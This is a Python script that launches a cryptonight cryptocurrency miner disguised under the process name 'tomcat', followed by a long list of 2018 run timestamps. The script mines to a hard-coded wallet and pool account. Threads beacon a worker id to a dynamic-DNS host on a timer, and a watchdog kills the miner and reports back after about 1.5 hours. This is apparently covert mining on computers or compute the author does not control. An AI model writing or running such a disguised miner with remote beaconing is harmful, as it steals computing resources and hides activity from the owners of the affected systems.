import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:05.996964
#2018-02-17 16:59:07.127225
#2018-02-17 18:48:01.432553
#2018-02-17 20:33:01.345108
#2018-02-17 22:19:02.056145
#2018-02-18 00:03:06.370348
#2018-02-18 01:54:03.860727
#2018-02-18 03:42:03.319896
#2018-02-18 05:28:05.609543
#2018-02-18 07:20:05.066450
#2018-02-18 09:08:01.373139
#2018-02-18 10:54:03.685778
#2018-02-18 12:41:04.955667
#2018-02-18 14:28:06.393550
#2018-02-18 16:18:06.307080
#2018-02-18 18:08:03.971359
#2018-02-18 19:54:06.821524
#2018-02-18 21:42:04.006330
#2018-02-18 23:31:01.729925
#2018-02-19 01:17:01.658550
#2018-02-19 03:03:08.304264
#2018-02-19 04:51:04.567727
#2018-02-19 06:37:01.888622
#2018-02-19 08:27:06.585182
#2018-02-19 10:16:06.253556
#2018-02-19 12:04:01.351919
#2018-02-19 13:51:04.453661
#2018-02-19 15:41:06.300928
#2018-02-19 17:29:06.806784
#2018-02-19 19:17:07.456262
#2018-02-19 21:05:08.217439
#2018-02-19 22:51:06.686197
#2018-02-20 00:35:05.449138
#2018-02-20 02:23:01.635014
#2018-02-20 04:13:05.560478
#2018-02-20 05:56:08.244217
#2018-02-20 07:42:01.866656
#2018-02-20 09:26:04.575266
#2018-02-20 11:10:05.186551
#2018-02-20 12:57:06.450074
#2018-02-20 14:41:05.673584
#2018-02-20 16:27:01.870601
#2018-02-20 18:13:08.646136
#2018-02-20 20:04:06.793755
#2018-02-20 21:51:06.856947
#2018-02-20 23:33:07.047998
#2018-02-21 01:21:04.213360
#2018-02-21 03:08:07.710817
#2018-02-21 04:58:05.325673
#2018-02-21 06:46:06.319892
#2018-02-21 08:33:07.410564
#2018-02-21 10:19:06.166605
#2018-02-21 12:06:06.557739
#2018-02-21 13:55:11.693935
#2018-02-21 15:39:04.082555
#2018-02-21 17:29:05.069865
#2018-02-21 19:17:01.759554
#2018-02-21 21:07:04.318922
#2018-02-21 22:55:01.684698
#2018-02-22 00:36:06.993996
#2018-02-22 02:25:08.629244
#2018-02-22 04:12:05.724374
#2018-02-22 05:57:05.941733
#2018-02-22 07:45:09.926734
#2018-02-22 09:35:08.525642
#2018-02-22 11:22:01.750537
#2018-02-22 13:08:05.732743
#2018-02-22 14:56:06.741263
#2018-02-22 16:41:01.856820
#2018-02-22 18:26:01.364995
#2018-02-22 20:19:08.214718
#2018-02-22 22:05:01.732648
#2018-02-22 23:53:07.137417
#2018-02-23 01:40:05.957200
#2018-02-23 03:27:03.660990
#2018-02-23 05:12:04.383795
#2018-02-23 06:58:06.034857
#2018-02-23 08:49:04.716568
#2018-02-23 11:11:04.697426
#2018-02-23 13:06:01.835968
#2018-02-23 14:50:09.494609
#2018-02-23 16:39:04.446908
#2018-02-23 18:27:06.291878
#2018-02-23 20:13:04.916470
#2018-02-23 22:03:02.082063
#2018-02-23 23:50:09.716903
#2018-02-24 01:41:03.800487
#2018-02-24 03:32:01.503090
#2018-02-24 05:17:02.031461
#2018-02-24 07:04:05.894042
#2018-02-24 08:52:03.747756
#2018-02-24 10:55:06.730993
#2018-02-24 12:43:05.884598
#2018-02-24 14:32:07.205664
#2018-02-24 16:20:06.278127
#2018-02-24 18:14:01.491769
#2018-02-24 20:01:05.659829
#2018-02-24 21:43:06.758853
#2018-02-25 00:39:04.967642
#2018-02-25 04:19:07.051127
#2018-02-25 07:51:01.625113